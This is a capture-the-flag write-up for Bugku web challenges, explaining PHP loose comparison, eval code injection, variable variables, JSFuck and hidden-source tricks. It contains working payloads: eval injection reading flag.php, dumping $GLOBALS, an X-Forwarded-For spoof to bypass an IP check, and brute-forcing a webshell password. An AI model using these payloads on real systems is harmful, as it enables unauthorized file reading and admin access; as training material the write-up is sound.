bugku: web challenge writeups

web2

Press F12 and read the page source: the flag sits in an HTML comment.

计算器 (Calculator)

Just compute the expression the page shows you.

The input box has a maxlength attribute shorter than the answer. Either edit the attribute in the dev tools (F12) or intercept the submission with Burp and change the value there; the limit is only enforced in the browser.

web基础$_GET (web basics: $_GET)

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

Pass the parameter in the address bar: ?what=flag

web基础$_POST (web basics: $_POST)

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

Send the POST parameter what=flag, for example with the Firefox HackBar extension.

矛盾 (Contradiction)

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

The two checks look contradictory: $num must not be numeric, yet must == 1. The trick is PHP's loose comparison. is_numeric('1a') is false, but '1a'==1 is true, because == juggles types before comparing: when a string meets an integer the string is converted to a number, and '1a' converts to 1 (only the leading numeric part counts). So ?num=1a passes both checks. This is a consequence of PHP being weakly typed. (PHP 8 changed this rule: 1=='1a' is now false, because a non-numeric string is compared with a number as a string.)

PHP weak typing

Weak typing means a variable is not declared with a type; the type follows from the value:

$a=1

$b='1'

$a is parsed as an int and $b as a string.

That looks convenient, but the problems start when the two are compared: $a==$b is true, and that is where the vulnerabilities come from. With == PHP first converts the operands (PHP 5/7 rules: two numeric strings are compared as numbers; a string compared with an integer is converted to a number; anything else is compared as a string):

 "0e132456789"=="0e7124511451155" //true   both are numeric strings in scientific notation and both equal 0
"0e123456abc"=="0e1dddada"	//false  neither is numeric, so they are compared as strings
"0e1abc"==0     //true   the string is cast to its leading number, 0 (false on PHP 8)
"0x1e240"=="123456"		//true   PHP 5 only, where hexadecimal strings counted as numeric; false since PHP 7
"0x1e240"==123456		//true   PHP 5 only, for the same reason; PHP 7 casts "0x1e240" to 0
"0x1e240"=="1e240"		//false  123456 is not 1e240

So if a server stores password hashes and the stored hash happens to look like 0e12345..., comparing it with == against any other hash of the form 0e<digits>, or against the integer 0, returns true.

Use === (or hash_equals() for hashes) when comparing, so that no type conversion happens.
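The following is an added example, not code from the original writeup: a small Python model of the PHP == rules described above, so the six comparisons can be checked without a PHP interpreter. It follows the PHP 7 rules by default and switches to the PHP 8 rules with php8=True; PHP 5's extra rule that hexadecimal strings are numeric is deliberately not modelled, which is why the two "0x1e240" lines come out false here.

```python
import re

# Added example (not from the original writeup): a model of how PHP's "=="
# juggles types for the string/string and string/int cases used above.
# Default: PHP 7 rules. php8=True: PHP 8 "saner string to number comparison".
# PHP 5 additionally treated hexadecimal strings ("0x1e240") as numeric; that
# rule is not modelled, so the writeup's two hex examples evaluate as on PHP 7.

# a PHP 7 numeric string: optional leading whitespace, sign, decimal, exponent
_NUMERIC = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$')
# the leading numeric prefix used by (int)/(float) casts ("1a" -> 1, "abc" -> 0)
_LEADING = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')


def is_numeric_string(s: str) -> bool:
    """PHP 7 is_numeric() for strings: decimal or scientific notation only."""
    return bool(_NUMERIC.match(s))


def to_number(s: str) -> float:
    """Cast of a string to a number: the leading numeric prefix, else 0."""
    m = _LEADING.match(s)
    return float(m.group(0)) if m else 0.0


def loose_eq(a, b, php8: bool = False) -> bool:
    """Model of $a == $b for str/str, str/int and int/int operands."""
    if isinstance(a, str) and isinstance(b, str):
        # two numeric strings compare as numbers ("0e1" == "0e99"), all others as strings
        if is_numeric_string(a) and is_numeric_string(b):
            return to_number(a) == to_number(b)
        return a == b
    if isinstance(a, str) or isinstance(b, str):
        s, n = (a, b) if isinstance(a, str) else (b, a)
        if php8 and not is_numeric_string(s):
            # PHP 8: the number is cast to a string and compared as a string
            return s == str(n)
        # PHP 5/7: the string is cast to a number (leading prefix or 0)
        return to_number(s) == float(n)
    return a == b


def strict_eq(a, b) -> bool:
    """$a === $b: same type and same value, no conversion."""
    return type(a) is type(b) and a == b
```

loose_eq("0e1abc", 0) is True and loose_eq("0e1abc", 0, php8=True) is False, which is the PHP 8 change mentioned above; strict_eq never juggles, which is why === is the safe comparison.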

web3

The page keeps throwing alert() dialogs; disable JavaScript (Firefox also offers to block further dialogs from the page).

In the F12 inspector there is a <script> containing an encoded string. It is HTML numeric character references (&#...;); paste it into a decoder and the flag comes out.

域名解析 (Domain resolution)

Add an entry for the challenge host to the local hosts file:


# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
	123.206.87.240        flag.baidu.com

Then browse to flag.baidu.com: the request now carries Host: flag.baidu.com, which is what the server's virtual host is keyed on, and the flag is returned. (Equivalent without touching the hosts file: curl -H 'Host: flag.baidu.com' http://123.206.87.240/)

你必须让他停下 (You must make it stop)

The page reloads itself endlessly; the source contains this snippet:

<script language="JavaScript">
function myrefresh(){
window.location.reload();
}
setTimeout('myrefresh()',500); 
</script>

Load the request into Burp Repeater and keep hitting Go: the response differs from reload to reload, and one of them contains the flag.

本地包含 (Local include)

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

$_REQUEST

By default contains the $_GET, $_POST and $_COOKIE arrays, so the parameter can be sent any of those ways.

eval()

eval() evaluates a string as PHP code. The string must be valid PHP and end with a semicolon; a return statement terminates evaluation immediately. (The manual's tip that eval is "useful for storing code in a database text field for later evaluation" is exactly the pattern that makes it dangerous.)

Here $a is interpolated, unquoted, into "var_dump($a);", so whatever we pass becomes PHP source. Close the var_dump( call and append our own statement: ?hello=1);print_r(file("./flag.php") turns the string into var_dump(1);print_r(file("./flag.php")); and the contents of flag.php are printed. (Because $a is used as an expression argument, ?hello=file("flag.php") also works, giving var_dump(file("flag.php")).)

变量1 (Variable 1)

<?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

The regex requires $args to consist only of letters, digits and underscores (\w), so no quotes or $ can be smuggled in. But the code then evaluates var_dump($$args), a variable variable: args names which variable to dump. args=GLOBALS dumps the $GLOBALS array, which includes everything flag1.php defined:

http://123.206.87.240:8004/index1.php?args=GLOBALS

 ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}"

The global $ZFkwe3 holds the flag.

web5

View the page source:

<div style="display:none;">([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+!+[]]]+(+(!+[]+!+[]+!+[]+[!+[]+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[
]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]+!+[]])+(+(+!+[]+[+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(
[![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[
+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+
[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]
])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]
]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+[]])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]])</div>

That blob is JSFuck, JavaScript written with only the characters []()!+. Paste it into the browser console and press Enter; it evaluates to ctf{whatfk}. The flag is that string in upper case.

头等舱 (First class)

Nothing on the page. Proxy it through Burp; the intercepted request looks ordinary, but sending it from Repeater shows the flag in a header of the response.

网站被黑 (Site hacked)

A directory scan with 御剑 finds http://123.206.87.240:8002/webshell/shell.php

It is a webshell login prompting for a password. Brute-forcing it with a small wordlist quickly gives hack, which returns the flag.

管理员系统 (Admin system)

At first this looked like an injection challenge, but every attempt returned:

IP禁止访问,请联系本地管理员登陆,IP已被记录. ("Access from this IP is forbidden; contact the local administrator to log in. Your IP has been recorded.")

F12 shows a base64 string in the page; it decodes to test123, presumably the password, and the admin account is admin.

In Burp, add the header X-Forwarded-For: 127.0.0.1 to the login request: the server trusts this client-controlled header as the source address, so the request is treated as local and the flag comes back.

web4

The hint is to view the source:

<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
